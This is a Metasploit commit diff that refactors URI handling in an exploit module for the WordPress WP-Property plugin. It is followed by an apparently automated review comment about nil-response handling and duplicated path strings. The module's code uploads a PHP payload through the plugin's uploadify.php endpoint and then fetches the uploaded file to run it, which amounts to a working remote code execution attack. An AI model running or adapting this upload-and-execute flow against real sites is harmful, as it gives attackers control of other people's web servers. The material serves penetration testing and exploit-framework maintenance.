Land #3152 - Use normalize_uri for module wp_property_upload_exec

bug/bundler_fix
Christian Mehlmauer 2014-03-28 13:22:54 +01:00
commit 94494e38e7
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 11 additions and 8 deletions


@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
uri = target_uri.path uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" 'uri' => uri
}) })
if not res or res.code != 200 if not res or res.code != 200
@ -70,8 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
uri = target_uri.path data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
uri << '/' if uri[-1,1] != '/' request_uri = normalize_uri(data_uri, 'uploadify.php')
peer = "#{rhost}:#{rport}" peer = "#{rhost}:#{rport}"
@ -80,13 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
data = Rex::MIME::Message.new data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
post_data = data.to_s post_data = data.to_s
print_status("#{peer} - Uploading payload #{@payload_name}") print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", 'uri' => request_uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}", 'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data 'data' => post_data
}) })
@ -95,12 +94,16 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end end
upload_uri = res.body upload_uri = normalize_uri(res.body)
print_status("#{peer} - Executing payload #{@payload_name}") print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({ res = send_request_raw({
'uri' => upload_uri, 'uri' => upload_uri,
'method' => 'GET' 'method' => 'GET'
}) })
if res and res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
end
end end
end end
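Review bot: The status check added after the final GET in `exploit` (`if res and res.code != 200`) only fires when a response arrives, so a timeout or dropped connection (`res` is nil) falls through with no message, while `check` treats a missing response as a failure via `if not res or res.code != 200`. If tolerating nil is deliberate, which seems likely for a request that may not return, document it with a comment such as `# a missing response is tolerated here; only a non-200 reply counts as failure`. Separately, the plugin path segments are now spelled out in both `check` and `exploit`; a small private helper that returns the `normalize_uri(...)` result would stop the two copies drifting apart. Both method bodies are only partly visible in these hunks, so confirm against the full file.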